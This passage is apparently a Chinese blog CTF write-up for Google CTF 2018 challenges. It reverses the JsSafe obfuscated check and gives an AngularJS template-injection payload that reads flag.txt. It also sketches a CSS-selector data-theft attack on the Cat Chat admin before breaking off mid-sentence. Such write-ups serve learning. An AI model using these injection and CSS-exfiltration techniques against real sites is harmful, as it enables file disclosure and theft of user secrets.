<!DOCTYPE html>
<html lang="zh">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <link rel="stylesheet" href="//unpkg.com/heti/umd/heti.min.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@500&family=Roboto+Serif:opsz,wght@8..144,100&display=swap" rel="stylesheet">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>
        梅子酒の笔记本
    </title>
    <link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">
    <link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">
    <link rel="stylesheet" href="/css/style.css">
<link rel="alternate" href="/atom.xml" title="梅子酒の笔记本" type="application/atom+xml">
</head>

<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-reply replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            GoogleCTF-2018-Writeup(JsSafe,Translate,catChat,gCalc)
        </p>
        <hr>
    </div>
    <div class="post-content heti">
        <h2 id="jssafe"><a class="markdownIt-Anchor" href="#jssafe"></a> JsSafe</h2>
<p>题目给出附件,可以看出该题主要思路为反混淆代码,求出符合条件的数值,其中的关键代码经过美化为:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">x</span>(<span class="params">х</span>) </span>&#123;</span><br><span class="line">    ord = <span class="built_in">Function</span>.prototype.call.bind(<span class="string">''</span>.charCodeAt);</span><br><span class="line">    chr = <span class="built_in">String</span>.fromCharCode;</span><br><span class="line">    str = <span class="built_in">String</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">h</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">for</span> (i = <span class="number">0</span>; i != s.length; i++) &#123;</span><br><span class="line">            a = ((<span class="keyword">typeof</span> a == <span class="string">'undefined'</span> ? <span class="number">1</span> : a) + ord(str(s[i]))) % <span class="number">65521</span>;</span><br><span class="line">            b = ((<span class="keyword">typeof</span> b == <span class="string">'undefined'</span> ? <span class="number">0</span> : b) + a) % <span class="number">65521</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> chr(b &gt;&gt; <span class="number">8</span>) + chr(b &amp; <span class="number">0xFF</span>) + chr(a &gt;&gt; <span class="number">8</span>) + chr(a &amp; <span class="number">0xFF</span>)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">c</span>(<span class="params">a, b, c</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">for</span> (i = <span class="number">0</span>; i != a.length; i++) c = (c || <span class="string">''</span>) + chr(ord(str(a[i])) ^ ord(str(b[i % b.length])));</span><br><span class="line">        <span class="keyword">return</span> c</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span> (a = <span class="number">0</span>; a != <span class="number">1000</span>; a++) <span class="keyword">debugger</span>;</span><br><span class="line">    x = h(str(x));</span><br><span class="line">    source = <span class="regexp">/Ӈ#7ùª9¨M¤À.áÔ¥6¦¨¹.ÿÓÂ.Ö£JºÓ¹WþÊmãÖÚG¤¢dÈ9&amp;òªћ#³­1᧨/</span>;</span><br><span class="line">    source.toString = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> c(source, x)</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="built_in">console</span>.log(<span class="string">'debug'</span>, source);</span><br><span class="line">        <span class="keyword">with</span>(source) <span class="keyword">return</span> <span class="built_in">eval</span>(<span class="string">'eval(c(source,x))'</span>)</span><br><span class="line">    &#125; <span class="keyword">catch</span> (e) &#123;&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">open_safe</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    keyhole.disabled = <span class="literal">true</span>;</span><br><span class="line">    password = <span class="regexp">/^CTF&#123;([0-9a-zA-Z_@!?-]+)&#125;$/</span>.exec(keyhole.value);</span><br><span class="line">    <span class="keyword">if</span> (!password || !x(password[<span class="number">1</span>])) <span class="keyword">return</span> <span class="built_in">document</span>.body.className = <span class="string">'denied'</span>;</span><br><span class="line">    <span class="built_in">document</span>.body.className = <span class="string">'granted'</span>;</span><br><span class="line">    password = <span class="built_in">Array</span>.from(password[<span class="number">1</span>]).map(<span class="function"><span class="params">c</span> =&gt;</span> c.charCodeAt());</span><br><span class="line">    encrypted = <span class="built_in">JSON</span>.parse(localStorage.content || <span class="string">''</span>);</span><br><span class="line">    content.value = encrypted.map(<span class="function">(<span class="params">c, i</span>) =&gt;</span> c ^ password[i % password.length]).map(<span class="built_in">String</span>.fromCharCode).join(<span class="string">''</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">save</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    plaintext = <span class="built_in">Array</span>.from(content.value).map(<span class="function"><span class="params">c</span> =&gt;</span> c.charCodeAt());</span><br><span class="line">    localStorage.content = <span class="built_in">JSON</span>.stringify(plaintext.map(<span class="function">(<span class="params">c, i</span>) =&gt;</span> c ^ password[i % password.length]));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在输入key完成后，会触发open_safe函数，随即进入</p>
<blockquote>
<p>password = /^CTF{([0-9a-zA-Z_@!?-]+)}$/.exec(keyhole.value);</p>
</blockquote>
<p>这里通过正则限制了传入的key的格式，只能传入</p>
<blockquote>
<p>数字 字母  下划线  @  ! ?  -</p>
</blockquote>
<p>等字符，正则匹配不符合则直接进入</p>
<blockquote>
<p>if (!password || !x(password[1])) return document.body.className = ‘denied’;</p>
</blockquote>
<p>若正则匹配，还需要进行</p>
<blockquote>
<p>!x(password[1])</p>
</blockquote>
<p>跟入 x() ，先大概看下x函数的流程：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">x</span>(<span class="params">х</span>) </span>&#123;</span><br><span class="line">    ord = <span class="built_in">Function</span>.prototype.call.bind(<span class="string">''</span>.charCodeAt);</span><br><span class="line">    chr = <span class="built_in">String</span>.fromCharCode;</span><br><span class="line">    str = <span class="built_in">String</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">h</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">for</span> (i = <span class="number">0</span>; i != s.length; i++) &#123;</span><br><span class="line">            a = ((<span class="keyword">typeof</span> a == <span class="string">'undefined'</span> ? <span class="number">1</span> : a) + ord(str(s[i]))) % <span class="number">65521</span>;</span><br><span class="line">            b = ((<span class="keyword">typeof</span> b == <span class="string">'undefined'</span> ? <span class="number">0</span> : b) + a) % <span class="number">65521</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> chr(b &gt;&gt; <span class="number">8</span>) + chr(b &amp; <span class="number">0xFF</span>) + chr(a &gt;&gt; <span class="number">8</span>) + chr(a &amp; <span class="number">0xFF</span>)</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">c</span>(<span class="params">a, b, c</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">for</span> (i = <span class="number">0</span>; i != a.length; i++) c = (c || <span class="string">''</span>) + chr(ord(str(a[i])) ^ ord(str(b[i % b.length])));</span><br><span class="line">        <span class="keyword">return</span> c</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span> (a = <span class="number">0</span>; a != <span class="number">1000</span>; a++) <span class="keyword">debugger</span>;</span><br><span class="line">    x = h(str(x));</span><br><span class="line">    source = <span class="regexp">/Ӈ#7ùª9¨M¤À.áÔ¥6¦¨¹.ÿÓÂ.Ö£JºÓ¹WþÊmãÖÚG¤¢dÈ9&amp;òªћ#³­1᧨/</span>;</span><br><span class="line">    source.toString = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> c(source, x)</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="built_in">console</span>.log(<span class="string">'debug'</span>, source);</span><br><span class="line">        <span class="keyword">with</span>(source) <span class="keyword">return</span> <span class="built_in">eval</span>(<span class="string">'eval(c(source,x))'</span>)</span><br><span class="line">    &#125; <span class="keyword">catch</span> (e) &#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>首先是创建了<code>ord</code>，<code>chr</code>，<code>str</code>这三个函数，分别对应<code>charCodeAt</code>，<code>fromCharCode</code>，<code>String</code>函数.接着又创建了<code>h()</code>,<code>c()</code>函数，其中<code>h()</code>函数可以大致判断为hash一类的函数，<code>c()</code>函数作用类似，接着是一个for循环包裹的debugger反调试，在浏览器中进行调试时，只需要在console里输入<code>a=999</code>即可进行绕过。接着是对<code>x</code>的处理，这里我观察到x并未声明，但是使用Vscode可以分析出x为 <code>function x(x:any):any</code> ，即<code>处理任意输入的x函数</code>。</p>
<p>随后处理source，进入try语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">return eval(&apos;eval(c(source,x))&apos;)</span><br></pre></td></tr></table></figure>
<p>因为我们需要返回一个true，因此 <code>c(source,x)</code> 返回值为true，仔细观察 <code>c()</code> 的逻辑:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">c</span>(<span class="params">a, b, c</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">for</span> (i = <span class="number">0</span>; i != a.length; i++) c = (c || <span class="string">''</span>) + chr(ord(str(a[i])) ^ ord(str(b[i % b.length])));</span><br><span class="line">        <span class="keyword">return</span> c</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看出主要是一个异或操作，再跟入x，x是使用<code>h(str(x))</code>生成的，细节如下:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">h</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">for</span> (i = <span class="number">0</span>; i != s.length; i++) &#123;</span><br><span class="line">            a = ((<span class="keyword">typeof</span> a == <span class="string">'undefined'</span> ? <span class="number">1</span> : a) + ord(str(s[i]))) % <span class="number">65521</span>;</span><br><span class="line">            b = ((<span class="keyword">typeof</span> b == <span class="string">'undefined'</span> ? <span class="number">0</span> : b) + a) % <span class="number">65521</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> chr(b &gt;&gt; <span class="number">8</span>) + chr(b &amp; <span class="number">0xFF</span>) + chr(a &gt;&gt; <span class="number">8</span>) + chr(a &amp; <span class="number">0xFF</span>)</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p><code>a</code>是s每一位的ascii码之和模65521，<code>b</code>是每一轮<code>a</code>值的和的模65521。</p>
<p>因此可以知道得到目标key的思路为:</p>
<ol>
<li>对key进行h函数处理</li>
<li>对source、key进行c函数处理</li>
<li>当c函数处理结果为真时，返回</li>
</ol>
<p>就可以写出exp了</p>
<h2 id="translate"><a class="markdownIt-Anchor" href="#translate"></a> Translate</h2>
<p>题目下方有几个链接，分别对应<code>French to En</code>、<code>En To French</code>、<code>Add Word</code>、<code>debug page</code>,<code>Reset</code></p>
<p>查看源码发现有<code>ng-if</code>，知道了是用Angular进行渲染的。debug页面是Json数据，将English的数据格式化之后为:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">english dictionary: &#123;</span><br><span class="line">		<span class="string">"lang"</span>: <span class="string">"en"</span>,</span><br><span class="line">		<span class="string">"translate"</span>: <span class="string">"Translate"</span>,</span><br><span class="line">		<span class="string">"not_found"</span>: <span class="string">"I don't know that word, sorry."</span>,</span><br><span class="line">		<span class="string">"in_lang_query_is_spelled"</span>: <span class="string">"In french, &#123;&#123;userQuery&#125;&#125; is spelled ."</span>,</span><br><span class="line">		<span class="string">"input_query"</span>: <span class="string">"What French word do you want to translate into English?</span></span><br><span class="line"><span class="string">		A few examples: informatique en nuage,</span></span><br><span class="line"><span class="string">		téléverser "</span>,<span class="string">"</span></span><br><span class="line"><span class="string">		title "</span>:<span class="string">"</span></span><br><span class="line"><span class="string">		Translation utility</span></span><br><span class="line"><span class="string">		for technical terms in French and English "</span>,<span class="string">"</span></span><br><span class="line"><span class="string">		subtitle "</span>:<span class="string">"</span></span><br><span class="line"><span class="string">		In the current pluri - polarized great powers context,</span></span><br><span class="line"><span class="string">		internationalization is the key</span></span><br><span class="line"><span class="string">		for good trans - border understanding between tech workers.</span></span><br><span class="line"><span class="string">		"</span>,<span class="string">"</span></span><br><span class="line"><span class="string">		informatique en nuage "</span>:<span class="string">"</span></span><br><span class="line"><span class="string">		cloud computing "</span>,<span class="string">"</span></span><br><span class="line"><span class="string">		mot - dièse "</span>:<span class="string">"</span></span><br><span class="line"><span class="string">		hashtag "</span>,<span class="string">"</span></span><br><span class="line"><span class="string">		courriel "</span>:<span class="string">"</span></span><br><span class="line"><span class="string">		email "</span>,<span class="string">"</span></span><br><span class="line"><span class="string">		téléverser "</span>:<span class="string">"</span></span><br><span class="line"><span class="string">		upload "</span>,<span class="string">"</span></span><br><span class="line"><span class="string">		ordiphone "</span>:<span class="string">"</span></span><br><span class="line"><span class="string">		smartphone "</span>,<span class="string">"</span></span><br><span class="line"><span class="string">		original_word "</span>:<span class="string">"</span></span><br><span class="line"><span class="string">		Word to translate "</span>,<span class="string">"</span></span><br><span class="line"><span class="string">		a "</span>:<span class="string">"</span></span><br><span class="line"><span class="string">		a "</span>&#125;</span><br></pre></td></tr></table></figure>
<p>french数据格式化为:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">french dictionary: &#123;</span><br><span class="line">		&quot;lang&quot;: &quot;fr&quot;,</span><br><span class="line">		&quot;translate&quot;: &quot;Traduire&quot;,</span><br><span class="line">		&quot;not_found&quot;: &quot;Je ne connais pas ce mot, désolé.&quot;,</span><br><span class="line">		&quot;in_lang_query_is_spelled&quot;: &quot;En francais, &#123;&#123;userQuery&#125;&#125; s&apos;écrit .&quot;,</span><br><span class="line">		&quot;input_query&quot;: &quot;Quel mot anglais voulez-vous traduire en français ? </span><br><span class="line">		Quelques exemples: cloud computing,</span><br><span class="line">		to upload &quot;,&quot;</span><br><span class="line">		title &quot;:&quot;</span><br><span class="line">		Application de traduction de termes techniques entre français et anglais &quot;,&quot;</span><br><span class="line">		subtitle &quot;:&quot;</span><br><span class="line">		Dans notre contexte actuel de multipolarisation des puissances,internationalisation est critique au bon entendement transfrontalier des travailleurs des TIC.&quot;,&quot;upload&quot;:&quot;téléverser&quot;,&quot;cloud computing&quot;:&quot;informatique en nuage&quot;,&quot;hashtag&quot;:&quot;mot-dièse&quot;,&quot;email&quot;:&quot;courriel&quot;,&quot;original_word&quot;:&quot;Mot à traduire&quot;,&quot;&#123;&#123;1+1&#125;&#125;test&quot;:&quot;asx&quot;&#125;</span><br></pre></td></tr></table></figure>
<p>这里我之前添加过一个数据<code>2&lt;a&gt;test&lt;/a&gt;</code>，但是在french的数据里，只出现了<code>2test</code>，查看源码，发现<code>&lt;a&gt;</code>已经被解析成了标签，因此这里可能存在问题。</p>
<p>题目描述里需要我们去读文件，因此这个题目应该不需要我们去构造XSS，结合之前已经得知页面使用的Angular渲染，尝试从Angular本身的语法去进行攻击。</p>
<p>于是创建<code>ng-include</code>属性:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;div ng-include=&quot;flag.txt&quot;&gt;&lt;/div&gt;</span><br></pre></td></tr></table></figure>
<p>但是发现引入文件失败，好想跟我猜想的不太一样…</p>
<p>仔细观察json数据，我们可以发现，json中的<code>input_query</code>会在最开始的页面显示，因此我们可以通过<code>add word</code>页面重写<code>input_query</code>的翻译值，传入<code>2</code>，发现返回2，确认执行成功。</p>
<p>题目让我们要读取文件，因此接下来需要绕过Angular沙盒读取文件，读取文件是无法仅用原生Js来完成的，所以需要搭配Angular来完成，翻了几个小时的文档，发现可以使用template来引入文件，加之从源码得到到<code>i18n</code>可以构造出payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;i18n.template(&quot;flag.txt&quot;)&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>即可得到flag</p>
<h2 id="cat-chat"><a class="markdownIt-Anchor" href="#cat-chat"></a> Cat Chat</h2>
<p>点开页面，可以获得源码，先分析源码，首先可以知道页面是使用Express写的，有以下路由:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">/room/$&#123;uuidv4()&#125;/</span><br><span class="line"></span><br><span class="line">/room/$&#123;uuidv4()&#125;/send</span><br><span class="line"></span><br><span class="line">/room/$&#123;uuidv4()&#125;/receive</span><br><span class="line"></span><br><span class="line">/server.js</span><br><span class="line"></span><br><span class="line">/catchat.js</span><br></pre></td></tr></table></figure>
<p>其中<code>send</code>路由下有四个switch分支，<code>/secret</code>分支中会将flag设置为cookie，但是我们是不需要自己的cookie的，因此这个题目应该是个XSS，结合题目是个聊天室，因此我们需要使用xss获取payload。</p>
<p>在switch分支上的<code>else if (msg[0] != '/')</code>判断会将用户的输入向所有用户广播。</p>
<p>而<code>catchat.js</code>中有一句非常关键:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (msg.match(<span class="regexp">/dog/i</span>)) &#123;</span><br><span class="line">	send(<span class="string">"/ban $&#123;name&#125;"</span>);</span><br><span class="line">	send(<span class="string">"As I said, d*g talk will not be tolerated."</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到admin用户会在<code>ban</code>这个操作中将用户名直接代入执行，因此这里可能就是攻击点。</p>
<p>以这个为基础，构造的攻击思路为:</p>
<ol>
<li>用户A邀请用户B到当前房间</li>
<li>用户A发表dog言论</li>
<li>用户B举报A</li>
<li>Admin进入房间并执行ban操作</li>
</ol>
<p>观察CSP规则，基本是无法适用script标签进行绕过了。</p>
<p>但是对于CSS是没有太多限制的，<code>ban</code>对应的代码为:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">ban(data) &#123;</span><br><span class="line">      <span class="keyword">if</span> (data.name == localStorage.name) &#123;</span><br><span class="line">        <span class="built_in">document</span>.cookie = <span class="string">'banned=1; Path=/'</span>;</span><br><span class="line">        sse.close();</span><br><span class="line">        display(<span class="string">'You have been banned and from now on won'</span>t be able to receive and send messages.<span class="string">');</span></span><br><span class="line"><span class="string">      &#125; else &#123;</span></span><br><span class="line"><span class="string">        display("$&#123;esc(data.name)&#125; was banned.&lt;style&gt;span[data-name^=$&#123;esc(data.name)&#125;] &#123; color: red; &#125;&lt;/style&gt;");</span></span><br><span class="line"><span class="string">      &#125;</span></span><br><span class="line"><span class="string">    &#125;,</span></span><br></pre></td></tr></table></figure>
<p>于是想到了之前打RCTF看到的一个骚操作:</p>
<ul>
<li><a href="https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense" target="_blank" rel="noopener">https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense</a></li>
</ul>
<p>这个攻击手法就是利用CSS的属性选择器进行匹配查找，文档如下:</p>
<ul>
<li><a href="http://www.w3school.com.cn/css/css_syntax_attribute_selector.asp" target="_blank" rel="noopener">http://www.w3school.com.cn/css/css_syntax_attribute_selector.asp</a></li>
</ul>
<p>但是又有新的问题了，这个显示的flag是修改后的，我们需要的是原本的flag，开始尝试绕过。</p>
<p><code>/secret</code>命令会将后面的参数直接拼接到cookie中，源码为:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">case</span> <span class="string">'/secret'</span>:</span><br><span class="line">        <span class="keyword">if</span> (!(arg = msg.match(<span class="regexp">/\/secret (.+)/</span>))) <span class="keyword">break</span>;</span><br><span class="line">        res.setHeader(<span class="string">'Set-Cookie'</span>, <span class="string">'flag='</span> + arg[<span class="number">1</span>] + <span class="string">'; Path=/; Max-Age=31536000'</span>);</span><br><span class="line">        response = &#123;<span class="attr">type</span>: <span class="string">'secret'</span>&#125;;</span><br></pre></td></tr></table></figure>
<p>继续看发送部分的源码:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">window</span>.addEventListener(<span class="string">'load'</span>, <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">  messagebox.addEventListener(<span class="string">'keydown'</span>, <span class="function"><span class="keyword">function</span>(<span class="params">event</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (event.keyCode == <span class="number">13</span> &amp;&amp; messagebox.value != <span class="string">''</span>) &#123;</span><br><span class="line">      <span class="keyword">if</span> (messagebox.value == <span class="string">'/report'</span>) &#123;</span><br><span class="line">        grecaptcha.execute(recaptcha_id, &#123;<span class="attr">action</span>: <span class="string">'report'</span>&#125;).then(<span class="function">(<span class="params">token</span>) =&gt;</span> send(<span class="string">'/report '</span> + token));</span><br><span class="line">      &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        send(messagebox.value);</span><br><span class="line">      &#125;</span><br><span class="line">      messagebox.value = <span class="string">''</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;);</span><br><span class="line">  send(<span class="string">'Hi all'</span>);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>继续看<code>send</code>方法:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">let</span> send = <span class="function">(<span class="params">msg</span>) =&gt;</span> fetch(<span class="string">"send?name=$&#123;encodeURIComponent(localStorage.name)&#125;&amp;msg=$&#123;encodeURIComponent(msg)&#125;"</span>,</span><br><span class="line">    &#123;<span class="attr">credentials</span>: <span class="string">'include'</span>&#125;).then(<span class="function">(<span class="params">res</span>) =&gt;</span> res.json()).then(handle);</span><br></pre></td></tr></table></figure>
<p>最后看看<code>handle</code>部分:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">handle</span>(<span class="params">data</span>) </span>&#123;</span><br><span class="line">  (&#123;</span><br><span class="line">    <span class="literal">undefined</span>(data) &#123;&#125;,</span><br><span class="line">    error(data) &#123; display(<span class="string">"Something went wrong :/ Check the console for error message."</span>); <span class="built_in">console</span>.error(data); &#125;,</span><br><span class="line">    name(data) &#123; display(<span class="string">"$&#123;esc(data.old)&#125; is now known as $&#123;esc(data.name)&#125;"</span>); &#125;,</span><br><span class="line">    rename(data) &#123; localStorage.name = data.name; &#125;,</span><br><span class="line">    secret(data) &#123; display(<span class="string">"Successfully changed secret to &lt;span data-secret="</span>$&#123;esc(cookie(<span class="string">'flag'</span>))&#125;<span class="string">"&gt;*****&lt;/span&gt;"</span>); &#125;,</span><br><span class="line">    msg(data) &#123;</span><br><span class="line">      <span class="keyword">let</span> you = (data.name == localStorage.name) ? <span class="string">' (you)'</span> : <span class="string">''</span>;</span><br><span class="line">      <span class="keyword">if</span> (!you &amp;&amp; data.msg == <span class="string">'Hi all'</span>) send(<span class="string">'Hi'</span>);</span><br><span class="line">      display(<span class="string">"&lt;span data-name="</span>$&#123;esc(data.name)&#125;<span class="string">"&gt;$&#123;esc(data.name)&#125;$&#123;you&#125;&lt;/span&gt;: &lt;span&gt;$&#123;esc(data.msg)&#125;&lt;/span&gt;"</span>);</span><br><span class="line">    &#125;,</span><br><span class="line">    ban(data) &#123;</span><br><span class="line">      <span class="keyword">if</span> (data.name == localStorage.name) &#123;</span><br><span class="line">        <span class="built_in">document</span>.cookie = <span class="string">'banned=1; Path=/'</span>;</span><br><span class="line">        sse.close();</span><br><span class="line">        display(<span class="string">"You have been banned and from now on won't be able to receive and send messages."</span>);</span><br><span class="line">      &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        display(<span class="string">"$&#123;esc(data.name)&#125; was banned.&lt;style&gt;span[data-name^=$&#123;esc(data.name)&#125;] &#123; color: red; &#125;&lt;/style&gt;"</span>);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;,</span><br><span class="line">  &#125;)[data.type](data);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到这一句:</p>
